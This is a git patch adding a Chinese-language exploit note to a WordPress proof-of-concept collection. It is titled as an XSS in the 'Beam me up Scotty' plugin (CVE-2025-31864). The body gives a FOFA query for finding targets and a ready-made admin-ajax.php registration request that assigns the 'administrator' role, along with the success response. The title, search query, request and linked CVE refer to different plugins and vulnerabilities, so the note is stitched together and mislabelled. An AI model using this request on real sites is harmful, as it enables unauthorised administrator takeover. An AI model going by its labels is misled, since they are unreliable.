From 67466e18faceacd4c136d545d3088cf1e84a011f Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Mon, 7 Apr 2025 14:08:11 +0800 Subject: [PATCH] =?UTF-8?q?Update=20WordPress=20Beam=20me=20up=20Scotty=20?= =?UTF-8?q?Plugin=E5=AD=98=E5=9C=A8xss=E6=BC=8F=E6=B4=9E(CVE-2025-31864).m?= =?UTF-8?q?d?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...cotty Plugin存在xss漏洞(CVE-2025-31864).md | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md b/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md index 8b13789..d4ce449 100644 --- a/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md +++ b/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md @@ -1 +1,45 @@ +## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864) +## fofa +``` +"/wp-content/plugins/wp-automatic" +``` +## 第一步 +通过 /registration 或 /membership-registration 前端页面注册 +## 第二步,注册后,使用该请求数据 +``` +POST /wp-admin/admin-ajax.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Accept: */* +Host: hackthebox.test +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335 + +----------------------------189123966817005614765335 +Content-Disposition: form-data; name="action" + +user_registration_membership_register_member +----------------------------189123966817005614765335 +Content-Disposition: form-data; name="security" + +THE_NONCE_HERE +----------------------------189123966817005614765335 +Content-Disposition: form-data; name="members_data" + +{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"} +----------------------------189123966817005614765335-- +``` +## 第三步,返回相应包如下 +``` +{ + "success": true, + "data": { + "member_id": 24, + "transaction_id": "", + "message": "New member has been successfully created." + } +} +``` +## github地址 +https://github.com/ubaydev/CVE-2025-2563